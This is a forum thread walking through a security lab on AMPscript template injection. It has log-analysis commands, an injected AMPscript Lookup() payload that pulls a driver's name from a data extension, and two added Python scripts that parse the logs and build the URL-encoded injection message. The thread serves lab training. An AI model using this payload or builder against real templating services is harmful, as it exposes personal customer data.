Forum Discussion
Threat Research: AMPscript Analysis
OK, I have solved the lab again...
So, let's start...
First get the IP address: how? Count which IP address is used the most...
Something like this will give you some data:
grep -i - * | awk '{print $8}' | sort | uniq -c | sort
Once you have the IP address, check again...
ml-user@ampscript-evaluation:~/Desktop/logs$ grep "n.n.n.n" *
api.log.1:2019-01-17 09:37:23,026 - [INFO] - AMPS_test_bed - n.n.n.n requested http://web-hook.imlcabs.iml/
api.log.1:2019-01-17 09:37:23,117 - [INFO] - AMPS_test_bed - n.n.n.n requested http://web-hook.imlcabs.iml/preview?….
business_unit=&endpoint=&extension=driver_partners&headers=&message=%25%25[
api.log.1:2019-01-17 09:37:33,644 - [INFO] - AMPS_test_bed - Processing message from n.n.n.n: %%[
api.log.1:2019-01-17 09:37:33,690 - [INFO] - AMPS_test_bed - n.n.n.n authenticated successfully with contact key abcdefgh-ijkl-mnop-qrts-uvwxyz123456
--> abcdefgh-ijkl-mnop-qrts-uvwxyz123456 will be what you want... that's the lookup key and the test contact key
Also note the URL used:
http://web-hook.imlcabs.iml/preview?….business_unit=&endpoint=&extension=driver_partners&headers=&message=%25%25[
If you check the data, you'll even see the 'Message' used.
If you do your query (the log will tell you what you need to enter), you'll get an answer/result like:
{"result":"Hi there I'm DARTH_VADER_YOUR_MASTER and I created this tool.\r"}
(of course it's not Darth Vader) :)
And when you dig further in the log, around line 940, you'll find the last message to re-use and count...
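The log triage described in the walkthrough above, as an added example that is not part of the original post or of the lab: it parses a few constructed lines laid out like the api.log excerpts (the 10.0.0.x addresses and the all-zero contact key are placeholders chosen here, not values from the lab), picks the most active IP the way the grep/awk pipeline does, pulls the contact key that IP authenticated with, and URL-decodes the message parameter of its /preview requests so the AMPscript appears in the clear.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample in the layout of the api.log excerpts above (not copied from the lab).
# The 10.0.0.x addresses and the all-zero contact key are placeholders.
SAMPLE_LOG = """\
2019-01-17 09:35:01,000 - [INFO] - AMPS_test_bed - 10.0.0.5 requested http://web-hook.imlcabs.iml/
2019-01-17 09:35:02,000 - [INFO] - AMPS_test_bed - 10.0.0.7 requested http://web-hook.imlcabs.iml/
2019-01-17 09:37:23,026 - [INFO] - AMPS_test_bed - 10.0.0.9 requested http://web-hook.imlcabs.iml/
2019-01-17 09:37:23,117 - [INFO] - AMPS_test_bed - 10.0.0.9 requested http://web-hook.imlcabs.iml/preview?business_unit=&endpoint=&extension=driver_partners&headers=&message=%25%25[%20SET%20@firstName%20=%20Lookup('driver_partners',%20'firstname',%20'partner_uuid',%20"00000000-0000-0000-0000-000000000000")%20]%25%25%20Hi%20there%20I'm%20%25%25=V(@firstName)=%25%25
2019-01-17 09:37:33,644 - [INFO] - AMPS_test_bed - Processing message from 10.0.0.9: %%[ SET @firstName = Lookup('driver_partners', 'firstname', 'partner_uuid', "00000000-0000-0000-0000-000000000000") ]%% Hi there I'm %%=V(@firstName)=%%
2019-01-17 09:37:33,690 - [INFO] - AMPS_test_bed - 10.0.0.9 authenticated successfully with contact key 00000000-0000-0000-0000-000000000000
2019-01-17 09:37:40,000 - [INFO] - AMPS_test_bed - 10.0.0.9 requested http://web-hook.imlcabs.iml/
"""

# One log line: optional "file:" prefix (grep over several files adds it), timestamp,
# level, component, then the free-text event.
LINE_RE = re.compile(
    r"^(?:[\w.]+:)?"
    r"(?P<ts>\d{4}-\d{2}-\d{2} \S+) - \[(?P<level>\w+)\] - (?P<component>\S+) - (?P<event>.*)$"
)
# The IP is not always the first word of the event ("Processing message from x.x.x.x: ..."),
# so look for it anywhere in the event text instead of trusting a fixed awk column.
IP_RE = re.compile(r"\b(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\b")
KEY_RE = re.compile(r"authenticated successfully with contact key (?P<key>\S+)")
URL_RE = re.compile(r"requested (?P<url>\S+)")


def parse_log(text):
    """Return one dict per parseable line, with 'ip' set to the first IP found in the event."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ip = IP_RE.search(ev["event"])
        ev["ip"] = ip.group("ip") if ip else None
        events.append(ev)
    return events


def ip_counts(events):
    """Equivalent of the grep | awk | sort | uniq -c pipeline: hits per IP."""
    return Counter(e["ip"] for e in events if e["ip"])


def top_ip(events):
    counts = ip_counts(events)
    return counts.most_common(1)[0][0] if counts else None


def contact_keys(events, ip):
    """Contact keys the given IP authenticated with (the lookup key the walkthrough points at)."""
    return [m.group("key") for e in events if e["ip"] == ip
            for m in [KEY_RE.search(e["event"])] if m]


def preview_messages(events, ip):
    """Decoded 'message' parameters from the IP's /preview requests (the %25%25 becomes %%)."""
    msgs = []
    for e in events:
        if e["ip"] != ip:
            continue
        m = URL_RE.search(e["event"])
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        if not parts.path.endswith("/preview"):
            continue
        msgs.extend(parse_qs(parts.query, keep_blank_values=True).get("message", []))
    return msgs


def triage(text):
    """Whole procedure: most active IP, its hit count, its contact keys and its decoded messages."""
    events = parse_log(text)
    ip = top_ip(events)
    return {
        "ip": ip,
        "hits": ip_counts(events)[ip] if ip else 0,
        "contact_keys": contact_keys(events, ip),
        "messages": preview_messages(events, ip),
    }


if __name__ == "__main__":
    for k, v in triage(SAMPLE_LOG).items():
        print(f"{k}: {v}")
```

Point the script at the real files by replacing SAMPLE_LOG with the joined contents of the logs directory; the optional file prefix in LINE_RE means the output of `grep "n.n.n.n" *` can be pasted in directly.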
- GusC, 5 months ago
Bronze III
Hi Netcat - yes, that's exactly what I mean. I click on "preview" on the page web-hook.imlcabs.iml and I get "" under JSON etc.
Thanks Steven - I had already got Q5 and Q6 - I'm stuck on how to populate the web application to pull back the name of the attacker, using the key 5*** - do you have some info around that?
- steven, 5 months ago
Silver II
So, the basis for this hack is this --> https://www.assetnote.io/resources/research/gaining-access-to-ubers-user-data-through-ampscript-evaluation
Try this for the message:
Message: %%[ SET @firstName = Lookup('driver_partners', 'firstname', 'partner_uuid', "5....") ]%% Hi there I'm %%=V(@firstName)=%% and I created this tool.
BTW, you'll find all the necessary messages to solve the lab in the log. Maybe you need to use CyberChef and URL-decode.
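The message from the post above, as an added example that is not from the original post, the lab or the assetnote research: a builder that wraps a Lookup() call in AMPscript the way the post does, the URL-encoding step for the preview endpoint's message parameter (which is why the log shows %25%25[ rather than %%[ and why a URL-decode is needed to read it back), and a parser that recovers the data extension, field, key field and key from a decoded message. The parameter names follow the URL quoted earlier in the thread; the all-zero key is a placeholder. Note that urlencode encodes spaces as + and brackets as %5B/%5D, so the encoded string is not byte-identical to the lab's log line, only equivalent after decoding.

```python
import re
from urllib.parse import parse_qs, urlencode

# Matches the Lookup() call from the post:
# Lookup('<data extension>', '<field>', '<key field>', "<key>")
LOOKUP_RE = re.compile(
    r"""Lookup\(\s*'(?P<extension>[^']*)'\s*,\s*'(?P<field>[^']*)'\s*,"""
    r"""\s*'(?P<key_field>[^']*)'\s*,\s*["'](?P<key>[^"']*)["']\s*\)"""
)


def build_lookup_message(extension, field, key_field, key, var="firstName",
                         template="Hi there I'm {value} and I created this tool."):
    """Build the AMPscript message: a SET block that stores the Lookup() result in a
    variable, followed by text that prints it with %%=V(@var)=%%."""
    set_block = f"%%[ SET @{var} = Lookup('{extension}', '{field}', '{key_field}', \"{key}\") ]%%"
    return set_block + " " + template.format(value=f"%%=V(@{var})=%%")


def encode_preview_query(message, extension="driver_partners"):
    """Query string for /preview using the parameter names seen in the log.
    urlencode turns '%' into '%25', so the message starts with '%25%25' as in the log."""
    params = {"business_unit": "", "endpoint": "", "extension": extension,
              "headers": "", "message": message}
    return urlencode(params)


def decode_preview_query(query):
    """Reverse step for a captured query string: the decoded message parameter."""
    return parse_qs(query, keep_blank_values=True).get("message", [""])[0]


def parse_lookup(message):
    """Lookup() arguments from a decoded message, or None when the message has no Lookup()."""
    m = LOOKUP_RE.search(message)
    return m.groupdict() if m else None


if __name__ == "__main__":
    msg = build_lookup_message("driver_partners", "firstname", "partner_uuid",
                               "00000000-0000-0000-0000-000000000000")
    query = encode_preview_query(msg)
    print(msg)
    print(query)
    print(parse_lookup(decode_preview_query(query)))
```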
- GusC, 5 months ago
Bronze III
Thanks Steve, I'll give that a go today.
BTW, are you mrmouse? You must have a good score in IL!